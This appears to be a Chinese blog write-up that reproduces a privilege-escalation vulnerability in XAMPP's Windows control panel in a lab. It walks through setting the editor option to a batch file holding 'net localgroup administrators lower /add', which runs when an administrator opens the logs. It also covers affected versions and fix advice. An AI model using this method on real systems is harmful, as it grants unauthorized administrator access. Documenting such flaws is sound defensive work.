目錄
1、XAMPP簡介
2、漏洞成因
3、影響范圍
4、環境搭建
下載XAMPP軟體
查看root賬戶資訊并添加賬戶lower
登錄賬戶lower
新建腳本conn.bat
運行XAMPP
提升為管理員權限
思考
1、XAMPP簡介
XAMPP(Apache+MySQL+PHP+PERL)是一個功能強大的建站集成軟體包,
這個軟體包原來的名字是 LAMPP,但是為了避免誤解,最新的幾個版本就改名為 XAMPP 了,它可以在Windows、Linux、Solaris、Mac OS X 等多種作業系統下安裝使用,支持多語言;XAMPP 的確非常容易安裝和使用:只需下載,解壓縮,啟動即可,該軟體和phpstudy類似,
2、漏洞成因
在windows下,XAMPP允許非管理員賬號訪問和修改其編輯器和瀏覽器的配置,編輯器的默認配置為notepad.exe,一旦修改配置后,則對應的每個可以訪問XAMPP控制面板的用戶都更改了配置,當攻擊者將編輯器的值設定為惡意的.exe檔案或.bat檔案,與此同時如果有管理員賬號通過XAMPP控制面板查看apache的日志檔案,便會執行惡意的.exe檔案或.bat檔案,以此達到任意命令執行,
3、影響范圍
Apache Friends XAMPP <7.2.29
Apache Friends XAMPP 7.3.*,<7.3.16
Apache Friends XAMPP 7.4.*,<7.4.4
4、環境搭建
下載XAMPP軟體


查看root賬戶資訊并添加賬戶lower

登錄賬戶lower

新建腳本conn.bat
low用戶新建conn.bat腳本,目的是將low用戶添加到administrators組
@echo off
net localgroup administrators lower /add
運行XAMPP

執行保存;之后轉換用戶為root用戶,點擊右鍵使用管理員運行xmpp軟體;
提升為管理員權限
執行如下命令:

思考
回想整個程序,其實就是多加了一個XAMPP的程序,核心無非就是以管理員的權限內,添加用戶進入管理員組
net localgroup administrators lower /add ;正常情況下我們直接也可以實作該功能點;
目前看來XAMPP上的管理員相當于在配置config中,將剛才的命令加入該配置內,而logs按鈕則是觸發整個命令執行的關鍵點所在,如果不觸發logs按鈕則不會執行添加用戶加入管理員組的權限;
以下是apache/logs檔案夾下install檔案
Installing Apache HTTP Server 2.x with
DomainName = example.com
ServerName = www.example.com
ServerAdmin = admin@example.com
ServerPort = 80
ServerSslPort = 443
ServerRoot = c:/Apache24
Rewrote docs/conf/extra/httpd-autoindex.conf.in
to c:/Apache24/conf/original/extra/httpd-autoindex.conf
Rewrote docs/conf/extra/httpd-default.conf.in
to c:/Apache24/conf/original/extra/httpd-default.conf
Rewrote docs/conf/extra/httpd-ssl.conf.in
to c:/Apache24/conf/original/extra/httpd-ssl.conf
Rewrote docs/conf/extra/httpd-multilang-errordoc.conf.in
to c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
Rewrote docs/conf/extra/httpd-info.conf.in
to c:/Apache24/conf/original/extra/httpd-info.conf
Rewrote docs/conf/extra/httpd-userdir.conf.in
to c:/Apache24/conf/original/extra/httpd-userdir.conf
Rewrote docs/conf/extra/httpd-mpm.conf.in
to c:/Apache24/conf/original/extra/httpd-mpm.conf
Rewrote docs/conf/httpd.conf.in
to c:/Apache24/conf/original/httpd.conf
Rewrote docs/conf/extra/proxy-html.conf.in
to c:/Apache24/conf/original/extra/proxy-html.conf
Rewrote docs/conf/extra/httpd-vhosts.conf.in
to c:/Apache24/conf/original/extra/httpd-vhosts.conf
Rewrote docs/conf/extra/httpd-dav.conf.in
to c:/Apache24/conf/original/extra/httpd-dav.conf
Rewrote docs/conf/extra/httpd-languages.conf.in
to c:/Apache24/conf/original/extra/httpd-languages.conf
Rewrote docs/conf/extra/httpd-manual.conf.in
to c:/Apache24/conf/original/extra/httpd-manual.conf
Duplicated c:/Apache24/conf/original/extra/httpd-autoindex.conf
to c:/Apache24/conf/extra/httpd-autoindex.conf
Duplicated c:/Apache24/conf/original/extra/httpd-default.conf
to c:/Apache24/conf/extra/httpd-default.conf
Duplicated c:/Apache24/conf/original/extra/httpd-ssl.conf
to c:/Apache24/conf/extra/httpd-ssl.conf
Duplicated c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
to c:/Apache24/conf/extra/httpd-multilang-errordoc.conf
Duplicated c:/Apache24/conf/original/extra/httpd-info.conf
to c:/Apache24/conf/extra/httpd-info.conf
Duplicated c:/Apache24/conf/original/extra/httpd-userdir.conf
to c:/Apache24/conf/extra/httpd-userdir.conf
Duplicated c:/Apache24/conf/original/extra/httpd-mpm.conf
to c:/Apache24/conf/extra/httpd-mpm.conf
Duplicated c:/Apache24/conf/original/httpd.conf
to c:/Apache24/conf/httpd.conf
Duplicated c:/Apache24/conf/original/magic
to c:/Apache24/conf/magic
Duplicated c:/Apache24/conf/original/charset.conv
to c:/Apache24/conf/charset.conv
Duplicated c:/Apache24/conf/original/extra/proxy-html.conf
to c:/Apache24/conf/extra/proxy-html.conf
Duplicated c:/Apache24/conf/original/extra/httpd-vhosts.conf
to c:/Apache24/conf/extra/httpd-vhosts.conf
Duplicated c:/Apache24/conf/original/extra/httpd-dav.conf
to c:/Apache24/conf/extra/httpd-dav.conf
Duplicated c:/Apache24/conf/original/mime.types
to c:/Apache24/conf/mime.types
Duplicated c:/Apache24/conf/original/extra/httpd-languages.conf
to c:/Apache24/conf/extra/httpd-languages.conf
Duplicated c:/Apache24/conf/original/extra/httpd-manual.conf
to c:/Apache24/conf/extra/httpd-manual.conf
error檔案下,可看到執行的命令程序

而執行該命令必須的根據配置走向而定位

控制臺必定由它的組態檔決定如何控制,控制的范圍;

后期修復的可操作性,可以讓普通用戶/管理員無操作該檔案的權限;只有超管可以;
比如:


結束!!!

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/197144.html
標籤:其他
上一篇:解決虛擬機中CentOS終端顯示亂碼的問題(手把手教學)
下一篇:ADB工具使用

